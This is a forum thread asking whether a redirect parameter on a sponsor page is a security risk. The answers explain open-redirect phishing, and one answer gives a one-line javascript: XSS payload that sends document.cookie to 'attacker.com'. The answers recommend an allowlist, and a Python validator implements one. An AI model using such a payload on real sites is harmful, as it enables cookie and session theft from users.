Can you find the security problem here?

Posted on 2024-07-08 00:03:58

I have a webpage that redirects to another webpage like this:

http://www.myOtherServer.com/Sponsor.php?RedirectPage=http://mylink.com/whereIwasgoingtogo.html

Then the Sponsor.php page displays an ad with a link saying "Continue to your page" that links to the passed in RedirectPage. Are there security/spoofing issues that could come from this? What is the best way to handle this? (note that the user is not logged in to either site)

Comments (3)

折戟 2024-07-15 00:03:58

It's a big problem. If I send you a link that looks like this:

 http://cnn.com/sponsor.php?redirectpage=http://bit.ly/jh2l14

You're going to think "Oh, CNN, that's a legit site", and you'll open it and click the 'Continue to Your Page' link. And then you'll be on one of the nastiest porn sites on the net and it'll have a giant booming male voice announcing to all your co-workers "Hot Damn I Want to !@$@#$ Your !(&¤&^$§ until I can't ¡⌐^(!#~~&$^#!@$!!" and you'll have to explain to your boss "I thought it was CNN!"

The hole here is your reputation. Blind redirects like this are dangerous.

And that's just one hole. How about this?

 http://cnn.com/sponsor.php?redirectpage=javascript:location.href='http://attacker.com/' + document.cookie

Now I've XSS-ed your site and stolen your user's cookies. Sure, you say there's no login info, but how about session data? Or when you add a login later, or someone else in your company uses this page a year later where users are logged in.

初吻给了烟 2024-07-15 00:03:58

This is definitely a security risk. You should avoid using in-URL variables when security is involved.

While nothing is totally secure, this is a much better way of handling this issue: http://www.webmasterworld.com/forum88/2910.htm

白云不回头 2024-07-15 00:03:58

If sponsor.php allows any value into RedirectPage AND ads imply an endorsement, or encourage people to think that they are on the right track you would be opening it to be part of a phishing attack. What's worse, you would probably be profiting from those attacks, which would likely make people rather displeased.

Keeping a list of permitted URLs (or patterns that they can follow) would go a long way to prevent problems.
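One way to implement the allowlist this answer recommends, and to reject the `javascript:` and arbitrary-host cases from the first answer, as an added example that is not code from the original thread. The host allowlist (`mylink.com`) is assumed from the question; everything else is constructed for illustration.

```python
from urllib.parse import urlsplit, urlunsplit

# Constructed allowlist for this example: the only hosts Sponsor.php may send users on to.
ALLOWED_HOSTS = {"mylink.com", "www.mylink.com"}
ALLOWED_SCHEMES = {"http", "https"}


def safe_redirect_target(raw: str, fallback: str = "/") -> str:
    """Return a normalised redirect URL if `raw` is on the allowlist, else `fallback`.

    Checks fail closed: non-http(s) schemes (javascript:, data:), scheme-relative
    URLs (//evil.com), hosts not on the list, and the usual bypasses of a naive
    prefix check (userinfo tricks like http://mylink.com@evil.com, backslashes,
    look-alike hosts like mylink.com.evil.com) all return the fallback.
    """
    if not raw or len(raw) > 2048:
        return fallback
    # Browsers treat backslashes as slashes in the authority and strip some
    # control characters; urlsplit does not. Reject rather than try to normalise
    # so that our parser and the browser's can never disagree.
    if "\\" in raw or any(c in raw for c in "\r\n\t "):
        return fallback
    try:
        parts = urlsplit(raw)
        if parts.port is not None:  # also raises ValueError on a malformed port
            return fallback
    except ValueError:
        return fallback
    if parts.scheme not in ALLOWED_SCHEMES:
        return fallback
    # Compare hostname (not netloc), so userinfo cannot hide the real host.
    host = parts.hostname
    if host is None or host not in ALLOWED_HOSTS:
        return fallback
    if parts.username is not None or parts.password is not None:
        return fallback
    # Rebuild from validated components; the fragment is dropped as unvalidated.
    path = parts.path or "/"
    return urlunsplit((parts.scheme, host, path, parts.query, ""))
```

Sponsor.php would call the equivalent of this on `RedirectPage` and print only the returned value into the "Continue to your page" link.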
